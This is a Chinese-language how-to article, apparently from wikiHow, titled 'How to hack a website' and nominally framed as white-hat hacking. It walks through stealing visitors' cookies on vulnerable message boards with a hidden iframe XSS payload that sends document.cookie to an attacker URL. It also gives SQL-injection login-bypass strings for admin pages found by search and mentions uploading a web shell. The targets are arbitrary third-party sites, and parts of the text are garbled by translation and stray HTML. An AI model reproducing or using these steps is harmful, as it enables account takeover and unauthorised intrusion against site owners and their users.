如何破解网站

有些人认为所有黑客都有恶意，但事实并非如此！“白帽”黑客利用网站中的漏洞帮助网站所有者提高安全性。白帽黑客甚至可以成为你的职业！这篇 wikiHow 文章将教你作为白帽黑客入侵网站的两种方法，给你一些示例代码，并帮助你完善你的黑客技能。

方法1 使用跨站脚本

1 找到一个可以发布内容的易受攻击的网站。留言板就是一个很好的例子。请记住，如果该站点不易受到跨站点脚本攻击，那么这将不起作用。

2 去创建一个帖子。您需要在“帖子”中键入一些特殊代码，这将捕获所有点击它的人的数据。

• 您需要测试一下系统是否过滤掉了代码。邮政
• <script>window.alert("test")</script>
• 如果您单击帖子时出现警告框，则该站点容易受到攻击。

3 创建并上传您的 cookie 捕手。此攻击的目标是捕获用户的 cookie，它允许您访问他们的帐户以访问具有易受攻击登录的网站。您将需要一个 cookie 捕捉器，它将捕获目标的 cookie 并重新路由它们。将 catcher 上传到您可以访问的支持php的网站，并且容易通过上传远程执行代码。示例 cookie 捕获器代码可以在示例部分中找到。

4 用你的饼干捕手张贴。在帖子中输入正确的代码，该代码将捕获 cookie 并将它们发送到您的站点。您需要在代码后添加一些文本以减少怀疑并防止您的帖子被删除。

• 示例代码如下所示
  <iframe frameborder="0" height="0" width="0" src="JAVAscript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></iframe>

5 使用收集的 cookie。在此之后，您可以将 cookie 信息保存到您的网站，用于您需要的任何目的。

方法2 执行注入攻击

1 查找易受攻击的站点。由于易于访问的管理员登录，您将需要找到一个易受攻击的站点。尝试在您最喜欢的搜索引擎上搜索管理员登录。asp 或管理员 login.php。

2 以管理员身份登录。键入 admin 作为用户名并使用几个不同的字符串之一作为密码。这些可以是几个不同字符串中的任何一个，但一个常见的例子是 1'or'1'='1 or 2'='2。

3 要有耐心。这可能需要一些试验和错误。

4 访问网站。最终，您应该能够找到一个允许您以管理员身份访问网站的字符串，假设该网站容易受到攻击。然后，以管理员身份登录，您可以执行进一步的操作，例如上传 Web shell 以获得服务器端访问权限（如果您可以执行文件上传）。

方法3 为成功做好准备

1 学习一两种编程语言。如果您想学习如何破解网站，您需要了解计算机和其他技术的工作原理。学习使用Python/ target=_blank class=infotextkey>Python、PHP（利用服务器端漏洞所必需的）或SQL等编程语言，以便更好地控制计算机并识别系统中的漏洞。

2 具备基本的html素养。如果你特别想破解网站，你还需要对 HTML 和 JavaScript 有很好的理解。这可能需要一些时间来学习，但是网上有很多免费的学习方式，所以如果你想学，你肯定会有机会。

3 咨询白帽。白帽子是黑客，他们利用自己的力量为善，暴露安全漏洞，让互联网成为每个人都更好的地方。如果您想学习破解并永久使用您的权力，或者如果您想帮助保护您的网站，您可能需要联系一些当前的白帽子寻求建议。

4 研究黑客。如果您想学习黑客或只是想保护自己，则需要进行大量研究。网站易受攻击的方式有很多种，而且列表不断变化，因此您需要不断学习。

5 保持最新。由于可能的黑客攻击列表不断变化，并且发现了新的漏洞，因此您需要确保保持最新状态。仅仅因为您现在免受某种类型的黑客攻击并不意味着您将来会安全！